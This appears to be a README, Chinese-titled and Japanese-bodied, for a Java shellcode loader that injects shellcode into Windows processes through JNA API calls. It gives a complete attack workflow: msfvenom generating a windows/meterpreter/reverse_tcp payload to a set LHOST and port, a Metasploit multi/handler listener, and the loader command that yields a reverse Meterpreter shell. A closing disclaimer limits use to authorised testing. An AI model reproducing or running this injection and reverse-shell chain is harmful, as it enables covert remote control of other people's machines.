
基于Java实现的Shellcode加载器
JavaベースのShellCodeローダーで、32ビットおよび64ビットのプラットフォームに対応しています。
中核となる原理は、Jnaを使用してWindows APIを呼び出し、shellcodeの注入を実現することです。
実行環境:Jre >= 1.5
注:本プロジェクトは、yzddmr6/As-ExploitsのShellCodeLoaderモジュールに組み込まれています。
maven package
デフォルトではランダムに32ビットプロセスへ注入されるため、32ビットのshellcodeを使用してください
java -jar ShellcodeLoader.jar shellcode_hex
x64ビットのshellcodeを注入する場合
java -jar ShellcodeLoader.jar --x64 shellcode_hex
hex形式のShellCodeを生成
┌──(root💀kali)-[~]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.10 LPORT=4444 -f hex
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of hex file: 708 bytes
fce88f0000006089e531d2648b5....
その後、リスナーを起動
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.88.10
set LPORT 4444
exploit -j
java -jar ShellcodeLoader.jar fce88f0000006089e531d2648b5....
リバース接続されたMeterpreterを受け取ることができます

本プロジェクトは、合法的なペネトレーションテストおよび愛好家の参考・学習のみを目的としています。不正な目的での使用はおやめください。使用した場合の責任は自己負担となります。